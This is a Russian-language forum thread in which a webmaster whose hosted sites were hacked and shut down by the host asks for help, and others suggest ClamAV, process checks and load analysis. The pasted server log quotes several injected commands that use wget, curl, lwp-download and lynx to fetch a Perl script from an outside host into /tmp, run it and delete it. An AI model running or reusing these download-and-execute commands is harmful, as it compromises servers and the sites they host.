basterr

basterr
Рейтинг
719
Регистрация
24.11.2005
dex:
вот примерно так установить http://www.linuxcenter.ru/lib/articl...antivir2.phtml

фигасе о_О. насчет хостера - сильно сомневаюсь, что помогут.

mc установлен. уже ищу.

dex:
надеюсь качете не к себе на комп?

а куда мне его качать-то еще? а какая ос я хз там.

dex:
тс - поставьте clamav, тем паче есть ssh - это самое простое решение в Вашей ситуации

я его сейчас качаю. а что с ним делать-то потом?:) ага. скачал я его. нод говорит, что там вирус.

з.ы. перл выключить не могут лично мне, только у всего сервака.

Nikolai Sokolov:
ps -aux | grep -i notonyourradio

это просто ничего не делает.

Nikolai Sokolov, я сам это где-нить запустить могу? или на своем компе как в файлах текст искать?

Brim.ru:
В принципе, можно понять какой сайт взломан и где находится дырявый скрипт по нагрузке на web-сервер, т. к. скорее всего именно на нем крутится больной скрипт (обычно бесконечный цикл хорошо заметен в нагрузке).

вообще-то я знаю какой сайт сломан. но они мне не верят. вообще черт его знает что делать.

basterr:
уже попросил помочь за деньги.

о как:

Мы не предоставляем таких услуг.

ну чтож. походу придется с ними расстаться. хвалебных отзывов об хт-сустемсе на этом форуме от меня больше не услышит никто. и извиняюсь перед всеми, кому я их советовал.

конечно виноват. уже попросил помочь за деньги. пока молчат.

мне денег-то не жалко. я только за день долларов 40 с этого потеряю. не говоря уже о возможности вылететь нафиг из индекса пс.

хех. сайты как раз и вырубили. пароли только что поменял.

kxk:
потом запускать по одному и смотреть ху есть кто

как я смотреть-то буду, если я вообще во всем этом "не в зуб ногой"?

вообще до этого мне давали такие логи:

WD=/storage/home/srv8005/htdocs/sevchem ; USER=srv8005 ; COMMAND=/bin/sh -c cd
/tmp;wget http://notonyourradio.com/21.txt;perl 21.txt;rm -rf 21.txt
Jul 20 23:38:16 c10 sudo: www : TTY=unknown ;
PWD=/storage/home/srv8005/htdocs/sevchem ; USER=srv8005 ; COMMAND=/bin/sh -c cd
/tmp;curl -O http://notonyourradio.com/21.txt;perl 21.txt;rm -rf 21.txt
Jul 20 23:38:16 c10 sudo: www : TTY=unknown ;
PWD=/storage/home/srv8005/htdocs/sevchem ; USER=srv8005 ; COMMAND=/bin/sh -c cd
/tmp;lwp-download http://notonyourradio.com/21.txt;perl 21.txt;rm -rf 21.txt
Jul 20 23:38:16 c10 sudo: www : TTY=unknown ;
PWD=/storage/home/srv8005/htdocs/sevchem ; USER=srv8005 ; COMMAND=/bin/sh -c cd
/tmp;lynx -source http://notonyourradio.com/21.txt;perl 21.txt;rm -rf 21.txt

по ссылкам тоже ходить не советую. и вырубали один сайт. я думал поправил, отписал им. нифига оказывается не поправил и сегодня выключили все.

ну я хз как там у хт-сустемса организовано.

kxk, ssh должен быть.

Всего: 13289